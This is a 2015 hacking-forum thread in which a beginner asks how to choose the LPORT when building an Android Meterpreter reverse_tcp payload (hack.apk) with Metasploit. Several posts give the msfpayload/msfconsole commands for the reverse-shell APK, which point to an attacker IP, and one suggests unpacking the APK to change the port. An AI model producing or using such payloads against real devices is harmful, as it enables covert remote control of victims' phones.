Kalikid, posted January 3, 2015

Hello,

First off I would like to say hi Hak5 forums, love the show and couldn't register with Kali's forum, so I came here because I would like to educate myself, or be educated by others, on some aspects of Metasploit/Kali.

To put it in the simplest terms, I was creating a payload for Android, and I was wondering, how do I know what LPORT to use?

For my first try I tried 446 with the following command:

    msfconsole android/meterpreter/reverse_tcp LHOST=<my.ip.adress> LPORT=446 R > hack.apk

and it returned an error that I can't specify exactly (because I don't remember), but to paraphrase, it was something along the lines of:

    invalid LPORT option

Then I switched it to

    msfconsole android/meterpreter/reverse_tcp LHOST=<my.ip.adress> LPORT=443 R > hack.apk

and for some reason that I can't understand, port 443 worked.

So back to my question... How do I know what LPORT to use when creating a payload?

    msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>

- See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.sDSTQbRg.dpuf

Mr-Protocol, posted January 3, 2015

The LPORT shouldn't matter, as long as it is accessible from the network you are trying to connect to it from.

See if this can clear up some answers: http://www.offensive-security.com/metasploit-unleashed/Main_Page

Kalikid (Author), posted January 3, 2015

Thanks, give me a second to do my reading!

fugu, posted May 9, 2015 (edited May 9, 2015 by fugu)

Just a side note, if you do a

$ cp hack.apk hack.apk.zip
$ unzip hack.apk.zip

you can see the files that are created. I think if I remember correctly, port number is just a value in an xml entry. I haven't really messed around with it, but it appears easy to change manually.

Also, you can try

$ msfpayload android/meterpreter/reverse_tcp S

to get more information on a payload.

cooper, posted May 9, 2015

The 'unzip' command (as any command on UNIX) doesn't give a shit about the extension of a filename, so you could simply run unzip hack.apk

fugu, posted May 10, 2015

I didn't know that, that's good to know. Thanks!